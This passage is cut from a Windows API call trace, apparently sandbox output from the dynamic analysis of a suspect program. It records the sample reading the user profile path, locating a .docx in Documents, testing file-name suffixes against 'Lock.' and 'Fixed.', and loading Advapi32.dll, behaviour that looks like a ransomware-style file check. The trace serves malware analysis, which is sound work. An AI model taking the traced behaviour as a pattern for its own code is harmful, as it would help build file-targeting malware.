lpString2="Lock.", cchCount2=5) returned 1 [0261.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5A-JQm_Dx.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A-JQm_Dx.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-JQm_Dx.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JQm_Dx.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qm_Dx.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0261.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m_Dx.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0261.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_Dx.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Dx.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0261.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0261.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0261.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0261.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0261.952] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0261.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0261.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0261.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0261.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0261.953] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0261.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0261.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0261.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0261.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0261.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0261.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0261.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0261.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0261.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0261.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0261.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0261.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0261.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0261.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0261.953] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0261.953] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0261.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0261.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0261.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x26) returned 0x249f1d0 [0261.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0261.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dKfh5A-JQm_Dx.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0261.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Kfh5A-JQm_Dx.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0261.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fh5A-JQm_Dx.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0261.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h5A-JQm_Dx.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0261.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5A-JQm_Dx.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0261.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A-JQm_Dx.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0261.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-JQm_Dx.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0261.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JQm_Dx.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0261.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qm_Dx.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0261.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m_Dx.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0261.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_Dx.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0261.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Dx.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0261.954] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0261.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0261.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3538 [0261.954] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0261.954] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3538 | out: hHeap=0x25c0000) returned 1 [0261.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0261.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0261.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0261.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0261.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0261.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0261.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0261.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0261.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0261.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0261.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0261.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0261.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0261.955] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0261.955] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0261.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0261.955] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0261.956] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0261.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0261.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0261.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0261.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1468 [0261.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0261.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0261.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0261.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0261.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0261.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0261.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0261.956] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0261.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0261.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0261.956] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0261.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0261.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0261.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0261.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0261.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0261.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9dc8 [0261.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0261.957] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0261.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0261.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0261.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0261.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0261.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0261.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0261.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0261.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0261.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0261.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0261.957] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0261.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0261.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0261.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d68 [0261.957] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0261.958] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0261.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0261.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0261.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0261.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0261.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0261.958] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0261.958] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.958] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0261.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0261.958] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0261.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0261.958] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0261.958] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0261.959] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0261.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0261.959] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/dKfh5A-JQm_Dx.docx", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77884b40, ftCreationTime.dwHighDateTime=0x1d4f5df, ftLastAccessTime.dwLowDateTime=0xd4658920, ftLastAccessTime.dwHighDateTime=0x1d47e04, ftLastWriteTime.dwLowDateTime=0xd4658920, ftLastWriteTime.dwHighDateTime=0x1d47e04, nFileSizeHigh=0x0, nFileSizeLow=0x18bb1, dwReserved0=0x8c30047, dwReserved1=0x234f6, cFileName="dKfh5A-JQm_Dx.docx", cAlternateFileName="DKFH5A~1.DOC")) returned 0xaa5760 [0261.959] FindClose (in: hFindFile=0xaa5760 | out: hFindFile=0xaa5760) returned 1 [0261.959] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0261.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0261.959] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0261.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0261.959] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0261.959] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0261.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0261.959] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0261.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0261.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0261.960] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0261.960] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.960] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0261.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0261.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0261.960] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0261.960] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0261.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0261.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0261.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0261.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0261.960] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0261.960] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0261.960] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0261.960] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0261.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0261.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0261.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0261.961] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0261.961] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0261.961] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0261.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0261.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0261.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0261.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0261.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0261.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0261.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0261.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0261.962] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0261.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0261.962] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0261.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0261.962] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0261.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0261.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0261.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0261.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2de8 [0261.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0261.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0261.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0261.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa128 [0261.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0261.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0261.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0261.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0261.962] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0261.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0261.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0261.963] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0261.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0261.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0261.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0261.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0261.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0261.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0261.963] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0261.963] HeapFree (in: hHeap=0x25c0000, 